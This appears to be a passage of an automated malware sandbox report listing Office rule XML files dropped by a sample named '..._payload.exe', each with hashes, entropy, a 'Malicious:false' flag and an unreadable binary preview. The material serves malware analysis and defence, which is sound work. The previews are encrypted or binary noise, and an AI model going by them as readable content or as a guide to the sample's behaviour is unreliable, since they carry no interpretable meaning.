                                                                                                                          Preview:<?xml........(..Z.wQ......V$.3..l.w...N.V.W.s..x.......(.>f......._...S...Y.&......J.......<.. .....(lKK.`...s....s.[2......'W/Q|.v29*.[Rjd...:X%...G[..8.`...eA.sPe.).['|Gk..=#.[..g...?..I....X.V~.{...........@.(.-....jNw.c8.o...(e...c.....<u..=...Vo./...a..RL.z...D.......V.U....$U.'....UV.Q1EX.&..Xk..T.\...U......1D..@....f.E.2A.z.....0}...=*.+.W.{..B..]...%.9g....w......W9.7.Q./.j..I...)&...R.O.Wz..'GP..w.q......u...de.r2%.O=.E....W...t;.....[0....4.A..... ....P....[....C..v..>I.r #A...f...[..]P...F..8.8..c..}N]!....@...-.....}......@)G>...Ir}Ll..]W#..b...{....t...AZ...m..k..o....m..x].....d.8z.2..h...,.x...rl ..[...~i...{.w.........:..a.f...QD......=..o.......hx.....P....a?.R..N.=.xL/.......R....(f.D.+/..~z.X..f(.F..h.\.......2...H..Q9e5.X...;...*..+phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11502v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1324
                                                                                                                          Entropy (8bit):7.844058976309825
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:sJ6v9Fkj8iJY03h8DyE/njTasecj8vvIIwbD:dv9FO8f0ODyunvazcjIqD
                                                                                                                          MD5:6466DED6CCE7FF465933157141358CD7
                                                                                                                          SHA1:6C32A9FF556F11F01EEB82B16ADE0B6ED48989E6
                                                                                                                          SHA-256:8F50F1F79F1AB4319D1A0EE58F70F3693F08EF69BC2938EE7876E1C2A6B5A64C
                                                                                                                          SHA-512:5325190D666CCBE5EEB70A740BD2A9E6A6110634DEF8625B6ED82C49042247E2EA59F21C5E5F3C8D648BAB07952D538D26B1B2E83574FA80EC9D73917563C7DA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..n...>.J|.n@....N....7...K.a.$.~...e.z.s.......L:..+.....@.Qo;..D...).j..n....z)e.I.>]....]...].Ix6./.o[.............?g;..uYc..............{*.o.^.RL.m-..#.7/..x....H..ON~$..i/.Y9.........E#*j...]@......L.6d/GM.C-.....{..S....nL..2...D.J%9..n.1....rFd%.+.....( |......v...[....f..(J=.4@.....@..Y..X...6V..)6.94....w.....$...y...T..8..u7(.........0.....,.a.`.D...8...m...Q.53.mF..{.e..P. ..O..)^..'6. (.T.z;[K.[...G....9...~=@.jex.0.......D...\.A0...l.H...sk}.=].....`.tA\is.>.pb{>.4..dB(.....V...o.H..dnS......Q..D.oNs2..,fy..............*y..........j)."O.;.........L`..-6(.*.....d.....}8......Ns_.0j...<SCC_R...i...w7......fa.Uo.*.DK......){.......*...5M..t...i..t.!..t..h...........f..S...i..)..q3.).t.7....d.*R3..1......f....CHRu..}af..w...!.#.g..Y..}.uA..+...\3.=:h...*.........%pM..."!{.F>.B2.b.~L.t.C......j...y.9.H.....t.....xN..6bl..j..I0).O.......X..P;....OW...h.C..+z....*<+.rm..3....zZ.Wf.....r-.&.]).X.R.jv....(.3....>0..@.D..`.(...oS^./F

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11504v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1435
                                                                                                                          Entropy (8bit):7.860605842992227
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:M4kLsTV3B+u0CyFZIyucuXp68Rm+ho30sQyssJ4RjfcSW1gd97sjfcfcv2YsBukI:McifCSRuciVRmw2LssWRj0POsjf8cv2q
                                                                                                                          MD5:E873DD4C70C8667AB5533B0B47979925
                                                                                                                          SHA1:46EE9B2EF5F9A205E48D558D94635B6751F9FFA4
                                                                                                                          SHA-256:02FE7F95DF48106C9046B716760725C3C38BBA886BA915B33C63401B5AA6AC2D
                                                                                                                          SHA-512:4025D510DEF19285C2011D676CBF4C81BA8E5FC58AA8DD03D2177214E0D3D6622C3748989A03B5C5938AF5F13947ACEF72626563AE73FF48CC97E631FA3CE4C8
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..V.i.S..`...R.#^.g...x.8I".Q...dd...Ew...x{Ld$....:..p........{.]..$H...5c..Y.B...+..9..#-. ..N."g..."A..q.D....IE=..O..y&..Q.!.E.4.;.(D~....e^.&..W...*...qa....4/..U.....4m9Bn$...*].3.P.%D....,A....uo..+.Z.MM..|..H.p|.\........B3P.x..9.O.y..L...ie.....CK6.....p.A....*..lE.Jk"....._.....<.nZE...t4$......]/. ...........<.%7....*...Kj<{MM.....RD.Y..g....m.$.`.&..Z..".._.nRg.).ipP`.i.j..u.UX.tR.!.......I..........;....xx...8.A.V..M)#.q.......[.K.c....{R...?T#....r\.Y.9O...I..>.....&.Z.K....}..ok...~ :.|F.r.ZdO.....A...z.v4....hapG&..i.&.T.7F.@...(rg..-...itN.~=...s...&.&-? w..O.T.P.@..WJ..X3..,)z....c....7@...nGu...RV...S..g...I0..~[..|..x$..o......w!.N.e0.w]k..c.|....Sg|.o.{..D.....po.].;v.C.i.:.....j..(....&U.@.(...._b..$.X.............|.%?<*v&)..:....,.H&............B.$....B..$J...:#3+..c.7).]PH...U!J.}i.1.K.p./..x0..T...u.X\.W..cA9.L.j{..K...."....1..z..:.....0......m.VF5..E....MH.n9wvP.0W.;.+lP.{.......F..dC7.<....T.Ka.`.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11514v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7119
                                                                                                                          Entropy (8bit):7.9685233110592755
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:12d+1swkpBziRi9tBepKxCXYX2X18K4+g32IZG:12csxPTkp6CXYmX18K4v2h
                                                                                                                          MD5:8BEFBE52130A6AF2D26F089B120D0B82
                                                                                                                          SHA1:7FA2FB9279E41FBBEC03A601D3A6B4F22EE1B58F
                                                                                                                          SHA-256:F585003F58636E1BC05632878B960AC06A2ACDA1EB342413CE6BD28309400D20
                                                                                                                          SHA-512:77962ED26F332DDE6B4CB9E75BFB64E2598A6A03B29BCCE95BAE15D136A79264AB63A0ED19B0F5DC8312388CDDDC9D027B741D19FCAD83D3287D635A2E1C8988
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.M..@5KM2..Wu;.)...s...dhl...'.|.^.........V........1....{).b........'...!....../.GB..D)..w3.=.....s.&...g...|H.b0A.O-.... a+n!. ./......".Q.....p.`]1.x8.x........]..0...cQU^s..QRh.d.$...>...'.a...jn...G.~.."..+.9...X.....6.pg2..% ?.b.BT..:.....v#t./.B.. .......el.........\....)W..k...B....T3.3w.?..!..+i.(5.g...f.eat.R...l.%=X\.....8QbJ.:......R...,....Xww..'....+.1j,4l.....L`%............M.O_l.......Rv.> ...._=`r.OZWr.t.....G..g.M7..*g.$..E?>....O.@.....5.C......s..u...B.....e.VjS@.Y.qd.....(NK../s....:F[...>....`.P.N.+.Q.^}.g.HVX....b...^:..Vf$....w(_...L+9.Q7... ,#.{.....{...~..r...G^.......ko.t..Hr.....*y4,.:J.|+....).D(Da.._..\d..T....s...=_....@.p.Lg.......fq..%.|..j..g6T.....-.]...5.~.Z.[..!..H..#T2...\_...L&..st?.2"..kK .#s.&.........=.....E[,rOs.^o<G..0..=..q...J.5v..$......$.{.......t.-...y.g.H....+g_.C.J.G[.k...oO.3..s|....$..*..ba....sP.d.U.[..C................h..%.9Io..U..~..l..3w. ...E..#....@..... .

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11659v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):762
                                                                                                                          Entropy (8bit):7.691961819239195
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:jtS5pzlIKQYPDpwI3Ij5wC9TeoewToARa6hc0UkyTzIPUGWV2pPLq5bTcii9a:RS5LIdYPOIY9V9TaZkrUZIvKbD
                                                                                                                          MD5:F28A2E8EBB1C9D32C667A4FEA762FC77
                                                                                                                          SHA1:26A43C30E8D9509220ACBE98A79E2E43626FFC85
                                                                                                                          SHA-256:CA17B466CAF8F7DFAE87F53D869CFB665270B83535D3532397AE8AB1CAEC3DA6
                                                                                                                          SHA-512:6B190AB6E98DDB1BC6A53D9028DB5EB7312A9FF68579639E9FE341E5BECB8F890E6AB5EB753D82C862266B797C381B924E0C97D85B52AE29973AD7F79DC21E6F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.A....]..s....Q.n..>.!a...$.~.".7.V.3{..C_ >OQh.q...q.~.C..p..Y.m.k0...C..m...3`z...6*L..rE...}|...S.[.J....&..2.,k......|...`...:.T...E<..p..g....&..p:..5...,..&....x"...f..s.v%.0.g/.r.*..q;vnR.Y......K....DQx...7/.L...[L...m.+a.I.2)J`>.}"7...`..CU.b.H.W..8.+uK!5]4..Q........6....U.....}*#..u.5F...u&...AZ.a.]$Y.......S!.....]#U..F.-(Fz...e..k.#....}.....S.s......4......*.7..?.......O..^...Y._>oJ.i......e.b>...m....u.s..w...3...l.x.d...?..^9).....Bv......{..t.^:j^.[p.d].N.s.....".....C.L.......QT..}.....H......G.....9%.P*n.Z7.E.....i...eE....y...v...i&jw...l.......7.E'w..oZg..9.#.O....m..P..P)%..[.7..(..^..y.z^..$..=.y.Y...k#.....1phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11701v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1463
                                                                                                                          Entropy (8bit):7.854368590851036
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Lqt2caBxOmudPIXXnPdA11t8u4oT7TPgfX1fpdfG/8JEE+bD:Wt2cm01OnVCz8u4oT7jaX1f7fG/ZZD
                                                                                                                          MD5:BC63BFAEA71B7F2DCF5E30A451C639C1
                                                                                                                          SHA1:2BF9CCD507F264729FC54E806DB54F263197DAA0
                                                                                                                          SHA-256:5E49F0EC04AC4E6DBCDD3A6B4357053E43637DB29D4D3CF38BEF9C6B6C3504D9
                                                                                                                          SHA-512:8E99B5D4C245C0EDC92305D97ECACD9F6AFB5CD0771332A027A340231A517DDC8336C9FC156526D4D0FA470A97BB146F2DBBD2DFF6025802AAA91B233ACB84D6
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.pA...e=.(g.nW..y..r...wD.k1...Y....!...*.-o..'i:...4?.....Z.:...5..JiB.!.N...C;B..CE #J.q.Z.....b..._...v..n;...+...=l.r'....iN.y..;C"l.hA.|.k..E.u..Hs.}N.p!.8g6...U..\.....F\.bD......f..T!v;..a..8."X.A.aQ.........X.sG".....a.g.[..Le...,........7....c..,[Hr.gA...b...F..C.k......LS....T.*....8.b*.a.)rq..w.xY..z....U...8+.f-Lo.....{..d.f.H6c5cx.D `Op...o...\..d.....A.B...5zr._..O.n....!`...V......B^.o$S~.5'..i:M..K1a..8.. .h..D..e(t.:S{o.....h......gV.k.O....s..\*4.%..x.... ..#}J...&lr......7.....b...U..l.~....0-R.WB.......[..^......$.;.I....W.Ki0..[.b...Gt.....i..V(\*...w..jy...|..~......Y._...$NtR..(.....4:....^.).a\).*KT...i.....>!.c......o/.~&?.*..n..~....3t...g.......59..f.o..0.g...h...k...-...+.!=.I...=M{..FsV.SB4...X.38.:...#|*f..k..I..w2,W.....J.\t}"..N.......7..)U.+y..gQ..../M.sGE......i..>..V.1N..:@]|..6...U.@d..i.>.*._.j..L..8W/..Ns...v..H..].N.4..Z....$..M2y......b.....&^...0.e;.7.....wh.f.t.5#.....&..DV.O'..">......M.M

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11705v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3505
                                                                                                                          Entropy (8bit):7.943909690684459
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:hnkmxuUWFHxpZYCUtYgoFQfqRrf32olQX6D:5khNlYJYZOWrv2og6
                                                                                                                          MD5:B4C9BA8C728EF24EBC8BCA6BCE5CB3D4
                                                                                                                          SHA1:1B0EC1BCB177AD15C966D53B1D396785B33D5AB5
                                                                                                                          SHA-256:44E1175A564953653634B936264AF74446A387DDB4D4ECC5FBF0D4E1E982E8E6
                                                                                                                          SHA-512:40DA2FE438493A341EB7B328D917DCB32ED877AE1CFE92803665683ED6F9A4756D08CB4A689610C28978FF80E1883B685A26A04A49A4910FDEE780132AB29A08
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.DJ)^{.!C1H.s1......v.5|.c.v,..n.E...h..u.A....S.K.....g.}...t..f.IF.|F.W)))r!O.~......D.NL......s...k..55F.qG.8..-...l..R.-v.|.s$:.....0.....$.1)..Z.L..V..(5..m...A.B.g.....Q..2.....;...+..'.8>.....eH]or:........M1...<wX.@........#}.+.....kb.P..........@..B.<u..?.[...9i..e..D....%H>W.?>..Ja.....b.zbO%P...+.U...X.........v.N..d..IBSX[.X....w..D...A.B.n......n4&eDc....a.znA^i..{d.........._I..I.}.....7#......hf)...C .f....P..A....~..CG.|d....nz..(.8....K....H.....C...z.'.$..#....5u.:..L..z4.;w.....:....EWD0...C..#).}..hEWsr....t..V.m.%.V.^'..hx.N...t....5..W...g....3.!..._...(d.!w..w..-".q6..g./...K..s@....](.%.x.bE3..M(./<N_O...~.oP.-Zx....ZU....G....b.Q.#i...'6......1Z.g.^..^..]\..&........1J9....h6[..O....{.qNku+..X,;...9V.z./K...9.:..0d&.G...N..H...T=......2.sD...HE.&.;...(>.d!A./.A]E.....]P+.3..$ W4..:.Ef..bU.......S...pH=[.[*.*.%*M$)M.V..Ltv-..W0.l....>..A.:...r...........4.......1-b../GN.....<l.......V...0`..(...m.?..5QV.G.$..OK.W...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11710v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):965
                                                                                                                          Entropy (8bit):7.7647466683596855
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:P4VyztV/xhcF52MOWYgtnX9zyvIRRgi1spD/bD:P40bcaMOtgttzywRR9SHD
                                                                                                                          MD5:6DE72CC363E05174B7D9790D47797685
                                                                                                                          SHA1:67E9C33C1A9F2498A363EE747B2DF101263E2250
                                                                                                                          SHA-256:7C9027B11D70977D2AB1409F7A88858F6A0809E4A156E6571BEEFDFE00F38899
                                                                                                                          SHA-512:87D76AD223B506B6E6F3062AE34CE4499263EEF9B900BD4D39DFECF78A2966B30CDF4C886BE35EB4453235FBB85759CC77EDB45B263F9CAEB99DBE8DF42DF5F0
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..IN.E.x...?j.....MekA.......[."9..$.(].I4..W..N4.....r$e..v........vO.l.}.3v.E.....?..t..-c.~..j.~"..=.V..*U..L.Ey....c..|...._..8..Z.U.H..A..u.?.[J..K...h8..186....<.j... ..6t..Y.pE.3>.....G.E3.xZ+4..p....H....IN.a.%...I.jx.My..+ez..k#......Is.sv/k~.^T.B.n.]z...O...q%.c]..).N..T....Gok...y0.W.{..*......x.u1..d.cK.+....N.d..x.M..|.D..ed...ID\..N)co.....B%.... ..y<.z.9....D......@.]g/h...\..nh.vN.,.......w;...R.4...t....j:6.A.......7`A.G.|.%M....Z..cZ..S..9Z.B....W.'.Ze.A.eW.k\........y..`..'.A..~N*.$..]~M`..g..w.U .....-!.....Q.....P3.&Y...m.u9`..{&j.9.(...I-|...W.*E.~...C..P...).v.F3X.b.U.KI6N..+.....7.qm...sO.a....N..k...!........6..... j*...(..Y..k.I.-.x`A.R.C.c...K*Q...h.u...(...Y..y*j.....+.6.!...G.....k.y..\..S.[..tf....L..M.....{....... I...`.f...=...X....:.:........c..Cw.V.k..aa. .gQR.]HMu..M.*3lb<..1E....-H..+...\6phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11767v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2983
                                                                                                                          Entropy (8bit):7.937640392177028
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:5ZVSmKfoEbiQqTiDlryZ+Gu4QcljvwOqQ0iPH3pNIOZPgKFrJF+obCAdD:5ZVSm84QqQQZzuij4OqiPXpBPgOrvj3l
                                                                                                                          MD5:50290425FF2D8B6D875AC94563D2C6A1
                                                                                                                          SHA1:D6FDEF5BF0A3CAAD3E55F45B5A7661B3436EC426
                                                                                                                          SHA-256:92E7720E5EB37CEA337BF9743F2B5C50A56DF28C8346121D5A97A275C2A59EF0
                                                                                                                          SHA-512:95EFE3420DEC9423FD3AD3B31109A0202AAA2A7BD5C7E48B870C040A3B1D692A355EBD69A17F477C9B8ACE77FEFEE4F6494FC69E90FE43E3E676F703F290DFDD
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.Jw.. ic....:...C..?x.1.......F<..@!n?......Vl+)..r*B.....&.Ik.[.z.i.L.........#.L{.....A.o..F...[...S.5{.*;.*..D8....LIT...4.6.....hs......X;...|C.h..m...{T.\d.....?...e..r.iH.b.F_.R.L.^..g_..=3..'.|.}..Y..%.&T.......Q..&....9.Kl..IY.*...Y..^.(.6,;z.K..6..j.i...k....J+...k..9*.;....qam..'ki.Y. ?$.B...D....uQ!|.z...q.)."NM....(.\.3i#"..Bw...g....."0...Y.H...[....q.[...t.u.....a1...:{..^...<.RjM..n@.......6.7..oSr.zNZ...j..9.....R..J.E...&..........u..T..oz....F........tc..x.9.j.?..e.9......a.7....m...HE......W.....c.....H.Z..:.....U5...T.........H..T...1(.vz .*...*....k...z........Y..jr.e.5...3.&..J.....s.....G.....(Bmg../.._...[..&..T...n..k...k.....#S.X{.N......C.]u.]V.(Z..m...$..(....}..f..Q....P..:.w.G...w.....]...s.`>e~.,;K.oY.v..9.qs...H.#4G.....t7...y...9...a.....~B...,...)..qQ....Hm)..].x....K..<j1...?...*..........L......V!.P...;......DEh..p.v...i......U.qH.M.....6,c..Or-..7.Q..t..r.M..3.}..d.<r..N._,../V.-.;.....0.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11768v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2487
                                                                                                                          Entropy (8bit):7.927379298105986
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:lkz2o3lv01ctZEBKPRhbmyCPfuOz9azZ/ViJ1jPklu98jJD:Kz2o181hKPDmy/OB+Qf/Uh
                                                                                                                          MD5:3C234DB378A8D9C5DA1DC3A3E7F2321B
                                                                                                                          SHA1:C64A26BB10161E2963497461D5E70BBB4851E982
                                                                                                                          SHA-256:92F2DC68F402078A60F77C76C84CAFC04EF9732E99CF5D4AADC7B772EA0CE8CA
                                                                                                                          SHA-512:950AE4F79B494D9C3A9913987F9301C94A88711A1E6E80691A88335D581F93D4F007D59B4BD164105920FE2CF63F4807152419FF737C9E97266B47A14D5EDAB6
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..S+...,.aS...~..s. ~..;.-.,D..6nn R...I\_Bu9..Ii.Q&.[d.M....@/....:...=.s.cN..\..% ]...7vQQ.z\H..{..qq..Z..F...o.B.BpgbC......*.>..5..N....&6{..\.&.0.+4<."~S.c..%I.$pY.7..:+(....I.-."I.-.m.%$ZO.2...S.5.S......h.....i.:a..{ !.-.b.=.....V....6...?.....N...?e0..a....7...:...."..%p/...w.|...~..r....2{.i...PQ..9......2_|I#..rL..........I.M...1L*.wAAc...;ll..........<6V.'....Bf.u...3.y.../..af;HP.B.}s...<......%Y..x..Z.h...u.....Y.,-....b....F..8.Nf...z..)`t.W...%v..o.D.u...-............>....d8u......~..b.;..d.D..r.<..^C...~..s.t.U....i.1..TJ.R.?..u.4\..(g&|.. ..P....y.3.M^....7r.....Y.U(..Q...eN-+r....v..\7.KA.J.........V...&."....l.....l..eb.).Nl[.`....f.. ....k..-..R....L.x@..InDo.xb^...B.......U-...MU``.D.0.?....(...d.......;......i...0.}S....!..g...}..Mn....pX.\{...(h..9....z*.3c..`....O........Vc..Z.C.Q1..4.Hy....).#.....q.u.5z../..AY[>.M..u...t_.3).w..d...+.!..Fw.8r..#..f..Wp....{.-.....~..(.\.._W.`8.K..(.V.^4l.........S.4L_...[@;...G.D...E

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11769v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3132
                                                                                                                          Entropy (8bit):7.94053108101565
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:WmItUAKU5td+MkmJHyyvQBuN36M7Hh8ADlQJ9d+/UgLmhLibocmvUuECvlkUD:DItrKgd+MBvQBuB6CieAiUvXVvz
                                                                                                                          MD5:67A79C5E88FBED240266993CB22A4154
                                                                                                                          SHA1:F8098A7E32489F4B8EBFF1BABB8A1BDE7549E30F
                                                                                                                          SHA-256:3EB973B47EC1CBB6317400E797B13FF3D38F837667AE2AEDC2E216DDF44D40F3
                                                                                                                          SHA-512:30ADB1C41B08A47B07AF8419055C1FCE98F45171EB5F1E39DDFA59499C3133F757C8AD91E8EDC9DFE722466028FFBE7775B8E454D54A61FDA15455A19FD119BF
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.=.:..DUU.......f.9%.....;...7.RgC(.,#..!O..\+...;B.....#.y.I......."...K$.|d.w........I..>..t.76.[...P.. ..h..[.H...T.3....G.......,.T.m..dF2.m...Kh....ntW.V...X..I8:...8....W;@....rQ..*..0x. .......".....o....a.>~....n5.P..9....;....UX.1X.-qj..:.1...-3.."m^X.>..u.x...O....1q...I.@.u....X...[..g[.F.F...U.*e.p.X.%....{.,K<...T1v.../.'..4...V-J....prQ.TI.<..u..5..60bh.m.?..k.z.3...(w(.V..."+...i._..e*.>.g..~.hN9..|.$....H...Tt...T1....)..4.O.~....h.i...4k..{..._.w..S.O.....Ve.%J.....H..S>.T1.T..R..S....>$.f...R .%$R.q6.2=V....3u....n.9..... ...k~z...c.&.,z.....^..3.].Z(...:-h..XY.Y.....IE.3.A....(...Z....r....O8...MU.A./;..9...Q....t(......M.0grg..5..s.P...I.Q(..V...W.............(...W4..H.2,......44....|.E.#3.^%.`.....h........->^!.q>+.j.).=D.V.J...+..].TOd.|"......".....S...''..:......N<.&:..b.....v..9y>.v.^.X...y.|.A'......@.....u..q|...U..?.I....F..~..v..2.b.V...G4'...?.n........5...!..u...6C.M]OM....b.P.....$.U..x...]..^w...w.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11770v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4968
                                                                                                                          Entropy (8bit):7.959937557062826
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:t4yMV5TdqlAJDt06bYt1t2Mwa7fEvt+pFixLsReNiWZdi5:FM/T4iDt06st1Fw/+cwRexZd2
                                                                                                                          MD5:84173FC5103F0C0EF0A9F3CBD58210D7
                                                                                                                          SHA1:6F2069CED3DB2C7EC9A626C25C33B8C946629F07
                                                                                                                          SHA-256:ECD2AE78102BFDBDF1B91FE3E603FB28222258AA9248EA3D64574EDAEBF3BF16
                                                                                                                          SHA-512:410A650AE413F81716E0FE8F10837262B88FEEC9A7B26C37FEC3024F8759DC67CD7DB5D5A5A4A50E8C12FF303FC4FC95F908138A5EB89DD325E84AD61B5F979F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.v...iZ..B[...W......w...\..M...G.Q......1...*zx....EHd.....W..u$B.co....qV.C..........[.'...^./........)...A..b......tM=K...=...c_....2.`....2s.l.....`{..'{{..Vy....X..h..a..[....'5..j...(;'\..{..n....#7.5^...d.6.....q..5.i.e?.K.~i.%2..6............T..g.w.....Q).'...L.O...3...w3.....Lk.I.t...X")_.$.x.FU2.....VZ.*G......d.."....SzH0...B%...j....C#...W.]+&...6k>.4oW.t..I.....j.....E/1.a........t-..&?,.F...H....K..B.2.b....1...$........I.6..^...F..).....[..^......].0...Gm(E..n.R........N0..o.3.=H..j.*.>G........4.7v,.`o.q.....!<..&..A.?4....H..mv.......!..g*mn6+..M._.......;..........4..h0....B..B..@i.r.6........sEc-......j.}..2.P...!q.}.....~.#Jjz..dM.T5Fc=!.\D...p...pX......].B.&.cvl.yU...do^..B_.."...x....CkR..iT25f5.B.....^.t...x .mBp.u..^:8.AN-O.%..7..Z....N.x!.P3..W....S.....0..L..2...I......Q..omMu.M.`..3Pw9C.ky..D.0f.q.., .@.ie.....XH..:..i..........=.~V>@...n.ew.+#.2.. .t.^,Oot QVUf..r...-...j...C_..]Zx....`.|}x...`~.I.y'9.3.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11771v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7596
                                                                                                                          Entropy (8bit):7.98098801686948
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:smeLbb00rlLnQWrdrRYkDVNeqsuRQTpEtz0fbRth:smeI0RLnndrAlQzyth
                                                                                                                          MD5:2C4580982B73CF96773781BCA2394255
                                                                                                                          SHA1:1B55629B4E4C24F694F0F107C3D1E30542AF5F4A
                                                                                                                          SHA-256:C07D22A53C0DA04C05A392FDB1FAA70DF29192DB7AC85BCEBEF6BEC1BFC82AE7
                                                                                                                          SHA-512:4DB4652BCF366FCDDD4546DE6F37A9ED74038AC11E1E4362077E35C77267E41225ACAEB5F8A6529853037631CB1391519128D0742419AC32E9178E3E65BDD0D6
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml:....... .w.......H......?/..V...R..~R&... }.E.d.z.ua...m.u..{.@.|....8..k.sv.+...t[k.....M..s....`......Q.\..M+...#E}...f....g.KI.N...2|..\.#....J,..U*.lz.....9v.o..[.+,l.S..2..R]?.C.Q......oa.;.Vn.._[1.U:.....36...4#.P.J@...h......J.#....\..K....f1.V...d.5.? ....C..$..B...V..a.........f.!czY#..2.:-U..v.`..."_..Sq..D. zv.(w.3...R7.!...q.'L.O.....Q....E.`....F.;m.].~P......A.T.......@.A1.6....Dq..N...,v...\Yr.lU..OS.....L.X\.8-.l..e4._,..g..X....m.0....,{...A[.TN..........j.n.C.L..u.y...3....!.....C/@.jtwfE.......z..@2..%....yy.M..P^^Me.2..5n7u$..&.?..c.rd.j..WVA.....%./y....2 .V+t..P..0..^.:R..p|.e...=..1.q.0..........%Z.8..b...=$&Sx..(..LS>......4.4[oX...uZ..7.Z.N.%..tfF...u.....<*Y&....[....^...!\....le*.+...~.......5..{%[F..C.r`.+1.M!..........M.....L....L..T:0V....q...8.n{......2,...r..t.w....q.gR].....xMR..%.|K.f..8.5.&.[tX.......r0N...{.....>h2....F.....C..~........r.).......D.P......vM...v.)8.msZ8xx..{..(.HQ?...i.....a.......

